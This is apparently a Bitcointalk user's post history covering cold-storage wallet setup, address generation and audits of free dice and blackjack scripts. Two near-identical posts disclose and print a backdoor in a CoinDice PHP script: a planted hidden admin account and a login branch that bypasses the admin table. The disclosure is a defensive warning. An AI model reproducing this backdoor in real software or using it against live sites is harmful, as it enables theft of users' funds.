Decided to go for the armory multisig wallet in the end, Used armory on an offline PC which I don't plug in to LAN at all. I have a very redundant but very secure setup stored in 3 separate safes at 3 separate locations. So I don't have a single point of failure, If I were to lose one of the document sets I could still get to my wallet through joining one of the pairs up. Thanks for this suggestion  |
|
|
|
|
I will have a go, 0.08BTC
|
|
|
|
How much do you earn every hour from them referral links?  Everyone knows about faucets.... your not providing anything new, just advertising for yourself. good game. |
|
|
|
|
Not sure with Core Client, But I use MultiBit for this.
|
|
|
|
If you don't trust /dev/random, it isn't necessary to invest in a hardware RNG unless you are going to be generating a LOT of addresses.
If you're only going to be generating a small number of addresses, you can simply roll a good set of dice or give a deck of cards a really good shuffle. Either of these should give you good random results.
If you really want to write your own code, you'll need to be absolutely certain that you haven't made any mistakes. One tiny mistake in your code can result in either never being able to access your bitcoins, or in accidentally leaking your private key due to errors in how you implement the cryptography. That's one of the benefits of using well reviewed open source software. At least then you know that many people have looked at the code and all agree that there are no fatal errors and it has been well tested by others as well.
Assuming that you still want to write your own program, you'll need to perform 3 basic steps to create a bitcoin address:
Step 1.
Generate a random 256 bit number with sufficient entropy to be used as a private key.
Step 2.
Calculate the compressed ECDSA public key using the Secp256k1 curve.
Step 3.
Convert the generated public key into a WIF bitcoin address.
Additionally, you'll probably want to convert the private key into a WIF bitcoin private key for ease of use later when you want to create transactions that spend the bitcoins that were received at the address.
You also might want to generate QR-Codes for both the private key and the address to make it easier to get the information into a computer later. Typing private keys and bitcoin addresses is time consuming, tedious, and error prone.
Let me know which of those 5 things you are uncertain about, and I'll point you in the right direction.
Thank You for the informative post, I have been doing a LOT of research and I think I have found many open source programs which already do this. especially in Python which I was going to use. I am going to fork the code though and create a version that prints QR codes and WIF addresses. I think this will be a good learning "elliptic curve". - See what I done there Really appreciate the post. |
|
|
|
Thank You both for your replies. It kinda depends on how convenient vs secure you want it. If it's for pure storage, a multisig paper wallet seems the way to go.
That is a great idea, it did not occur to me to use multisig, certainly something I will be looking into more. You seem to be on the right track thus far. I personally use Armory for my offline wallet: https://bitcoinarmory.com/download/If you do decide to write your own software, that is quite an undertaking! I wish you well. I will look into armory, I like to write my own code so that I KNOW it is safe. I am also looking more into this. |
|
|
|
lol, did not see in your sig, I tend to ignore them added to post. |
|
|
|
Original Threadhttps://bitcointalk.org/index.php?topic=908996.0OutcomeCoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part. DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this I looked at the admin login script ( https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php) Surprise Surprise if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', ''); if (!empty($_POST['ga_playertest'])) {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
This allows the fake admin to login and withdraw your funds, Please see solution below. SolutionDo not use or Buy johny1976's original copies, If you are unsure of any code please ask an experience developer on these forums. https://bitcointalk.org/index.php?topic=718910.0 - CoinJack https://bitcointalk.org/index.php?topic=507515.0 - CoinDice *Buying the original copy also supports development*
|
|
|
|
I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters. I will post my findings soon. Backdoor FoundCoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part. DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this I looked at the admin login script ( https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php) Surprise Surprise if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', ''); if (!empty($_POST['ga_playertest'])) {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
Everybody should remove this ASAP. You don't know what else could be hidden in here. I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know. cloverme, I am assuming you have the original game? What line is meant to be in login.php? |
|
|
|
Hi, I am in the process of creating an offline secure wallet to store my BTC. I am wondering the best way to do this? I am quite paranoid about security so would prefer the approach "the more secure the better", even if it is a pain in the backside to do. So far I have an offline PC (Ubuntu Server, AMD R9 290) I have the following questions. 1) What is the best software to use to create the wallet? I dont know if I trust bitcoind or bitcoincore, I am even happy to write my own software if it is more secure (what would I need to look into to do this) 2) Is there any software out there apart from what I have mentioned that can do this? 3) I understand on Linux that it will be using /dev/random and /dev/urandom, are these truly random enough or is it worth investing in a hardware RNG? ( http://www.entropykey.co.uk/) 4) is there anything else I should take into account, I am going to print it and have a copy of the private key in my safe and in my parents safe, No-one has access to this apart from them. Thanks for any help. |
|
|
|
|
I would like to offer my services, I have over 10 years experience with PHP. I am looking to gain reputation on this website and want to help others where I can.
I can do the following:
Create Scripts from Scratch (Whatever you want) - I have experience with Bitcoin JSON-RPC also.
Proof Read Scripts
Amend Scripts, Fix Scripts
Install Scripts if you are having issues
I can do almost anything with Linux, Apache, MySQL, PHP4/5, So please ask me if I have forgot to put it down here.
TechnoBibble
|
|
|
|
you can have multiple drivers for each com port. 1) try a different cable. 2) try a different USB port. 3) try a different PC (if you can, just to confirm working). 4) check this out and try the drivers here ( http://www.eyeboot.com/how-to-dualminer) 5) try different mining software to see if that recognizes it. |
|
|
|
CryptoBlackJackhttps://github.com/felinegambler/CryptoBlackJackCryptoDicehttps://github.com/felinegambler/CryptoDiceBoth scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across). Both scripts support all Bitcoin based cryptocurrencies. if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.comPlease Readdue to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.Have Fun! Thank You for the new release, I will Audit these scripts when I get home from work tonight. |
|
|
|
|
Just checked through the source, Could not find anything untoward or any backdoors, everything requires you to have a logged in session before hand.
I did check through the old posts on here about it though and it does seem that there was "some" hard-coded address in the wallet.php file, this now seems to have been removed though. So use the latest update and keep an eye on the source code for change.
Looks safe to use. For now...
|
|
|
|
Sounds good. I was going to write something for webmin to do similar, seems to come with a lot of options which is a good point.
Where can we find the source code? If its managing my bitcoind I want to be sure it doesnt have any 'coin stealing' code. Especially as im putting my rpc user/pass in the config.
I'm sure it doesnt but cannot be too careful.
Code for my module is here: https://github.com/craigwatson/puppet-bitcoindPuppet is an open-source Ruby-based modular DSL - you can download modules to manage pretty much anything, from SSH to Apache to system users, groups and packages. My module is really aimed at those already using Puppet, but the general principle is that you can either have Puppet run 'mastered' or 'masterless': - Mastered Puppet means that you have a "Puppet Master" which is a central server where all of your nodes check into for their configuration. Your Puppet code lives on this server, and Puppet "manifests" are compiled and sent to nodes when they check in. The client-side Puppet agent parses these manifests and applies the configuration. Communication between the node and agent is done via HTTPS.
- Masterless Puppet means that your Puppet code is checked out on all of your nodes, and the client-side agent both compiles and applies the manifests.
Both approaches mean that you have your code in some kind of source control (Git, SVN, CVS) and checked out on your server, so the security of your credentials is really dependent of the security of your source control - that said, if you're that paranoid, you can back data sources like Hiera with GPG. Looks and sounds great, Im going to try it out. Thank You |
|
|
|
|
How do people fall for this stuff....
|
|
|
|
|
Sounds good. I was going to write something for webmin to do similar, seems to come with a lot of options which is a good point.
Where can we find the source code? If its managing my bitcoind I want to be sure it doesnt have any 'coin stealing' code. Especially as im putting my rpc user/pass in the config.
I'm sure it doesnt but cannot be too careful.
|
|
|
|
|
Is this based on BitcoinDice or CoinDice from Johny?
Aparently he left a backdoor in it to be able to steal deposited coins. I have yet to confirm (I'm a PHP dev and still need to look over the code)
Good job on releasing a dice game for tor network though.
|
|
|
|
|
Show Posts
